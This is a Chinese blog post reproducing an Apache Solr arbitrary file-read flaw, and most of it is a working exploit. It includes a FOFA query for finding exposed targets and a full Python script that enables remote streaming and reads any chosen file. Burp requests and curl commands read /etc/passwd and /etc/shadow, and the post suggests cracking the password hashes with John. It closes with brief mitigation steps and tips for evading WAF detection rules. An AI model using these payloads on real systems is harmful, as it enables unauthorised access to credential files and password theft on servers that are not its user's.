【Apache】Apache Solr任意文件读取漏洞复现

2021-05-05

Word count: 1.7k | Reading time≈ 8 min

FOFA

app="Solr" || app=""Apache-Solr"

漏洞描述

Apache Solr 全版本存在任意文件读取漏洞，攻击者可以在未授权的情况下获取目标系统的敏感文件。

我综合了网上的两种漏洞利用，写了一篇比较详尽的文章。

漏洞影响版本

Apache Solr 全版本

漏洞PoC

感谢PeiQi师傅，yyds！

# coding=utf-8
# Apache Solr 全版本任意文件读取
# Fofa：app="Apache-Solr" || app="Solr"

import requests
import json
import sys
import time

def title():
    print("+～～～～～～～～～～～～～～～～～～～～～～～～～～～～～+")
    print("+～～～～～～ Apache Solr 全版本任意文件读取 ～～～～～～+")
    print("+～～～～～～     Use: python3 solr.py     ～～～～～～+")
    print("+～～～～～～   url: http://x.x.x.x:port   ～～～～～～+")
    print("+～～～～～～～～～～～～～～～～～～～～～～～～～～～～～+")
    time.sleep(2)

def get_name(url):
    url_1 = url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        res = requests.get(url=url_1)
        #将json数据python字典话
        name = str(list(json.loads(res.text)["status"])[0])
        print("[!]  获取到目标系统name:\033[31m%s\033[0m"%name+"  [0]"+"URL:"+url+"/solr/"+name+"/config")
        return name
    except Exception as e:
        print("[!]  目标URL无法进行利用。",e)
        sys.exit(0)

def check_vul(url,name):
    url_2 = url +"/solr/" + name + "/config"
    data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'

    try:
        res = requests.post(url=url_2,data=data)
        if "This response format" in res.text and res.status_code == 200:
            print("[!]  \033[31m目标系统存在漏洞\033[0m")
        else:
            print("[!]  目标系统不存在漏洞")
            sys.exit(0)
    except Exception as e:
        print("[!]  目标系统请求失败。")
        sys.exit(0)

def read_files(url,name,file_name):
    url = url + "/solr/" + name + "/debug/dump?param=ContentStreams"
    # 此处必须要加content-type,否则读取不到文件
    headers = {
        "Content-Type" : "application/x-www-form-urlencoded"
    }
    data = "stream.url=file://{}".format(file_name)

    try:
        res = requests.post(url=url,headers=headers,data=data)
        if "No such file or directory" in res.text:
            print("[!] 目标系统读取文件失败！")
            sys.exit(0)
        else:
            print("正在读取文件..........")
            content = (json.loads(res.text)["streams"][0]["stream"])
            print("[o] 读取文件内容为：\n\033[34m{}\033\0m".format(content))
    except Exception as e:
        print("[!]  目标系统似乎意外中断了",e)
        sys.exit(0)

if __name__ == "__main__":
    title()
    url = str(input("\n[!]  请输入目标系统URL: "))
    name = get_name(url)
    check_vul(url,name)
    file_name = str(input("[!]  请输入要读取的文件："))
    read_files(url,name,file_name)

环境搭建

复现环境使用了Apache Solr 8.8.1版本，搭建在kali2021虚拟机上
https://archive.apache.org/dist/lucene/solr/8.8.1/
https://solr.apache.org/downloads.html

解压后，进入bin目录执行启动命令

./solr strat

访问url,出现如下页面即为启动成功

此时启动的solr是没有核心进行索引和搜索的，这里需要创建一个数据驱动模式的核心

./solr create -c [name]

漏洞复现

Exploit①

访问url

http://192.168.xxx.xxx:8983/solr/admin/cores?indexInfo=false&wt=json

burp数据包为

GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1
Host: 192.168.xxx.xxx:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

再使用burp进行POST请求

POST /solr/test/config HTTP/1.1
Host: 192.168.xxx.xxx:8983
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 82

{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

当出现”This response format is experimental. It is likely to change in the future.” 表示存在漏洞。

进行文件读取

POST /solr/test/debug/dump?param=ContentStreams HTTP/1.1
Host: 192.168.xxx.xxx:8983
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 35
Content-Type: application/x-www-form-urlencoded

stream.url=file:///etc/passwd

也可以读取shadow文件然后进行john爆破出密码

POST /solr/test/debug/dump?param=ContentStreams HTTP/1.1
Host: 192.168.xxx.xxx:8983
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 35
Content-Type: application/x-www-form-urlencoded

stream.url=file:///etc/shadow

Exploit②

curl -d '{  "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://192.168.xxx.xxx:8983/solr/test/config -H 'Content-type:application/json'

curl "http://192.168.xxx.xxx:8983/solr/test/debug/dump?param=ContentStreams" -F "stream.url=file:////root/a.txt"

可以读取被攻击的主机文件

Exploit_POC

https://github.com/Henry4E36/Solr

漏洞修复

由于目前官方不予修复该漏洞，暂无安全版本。

开启身份验证/授权
配置防火墙策略，确保Solr API（包括Admin UI）只有受信任的IP和用户才能访问
禁止将Apache Solr放置在外网

厂商防护及绕过思路

这种组件直接放内网就好了，或者一定配置身份校验，且Solr路由写的比较死，厂商提取规则时只要将url过滤完整即可，不会存在绕过情况。

绕过的话，虽然说每个漏洞url较为固定，但是每个功能的触发点皆为每个core或collection，core的名称包含在url中，且生产环境中为用户自定义，很多规则编写者通常只将示例example加入检测，可绕过几率很高。

参考文章

https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ
https://mp.weixin.qq.com/s/iX2OasjynZ0MAvNTvIcmjg
https://mp.weixin.qq.com/s/O2-rkmfkuXNr-xSLwfeQlw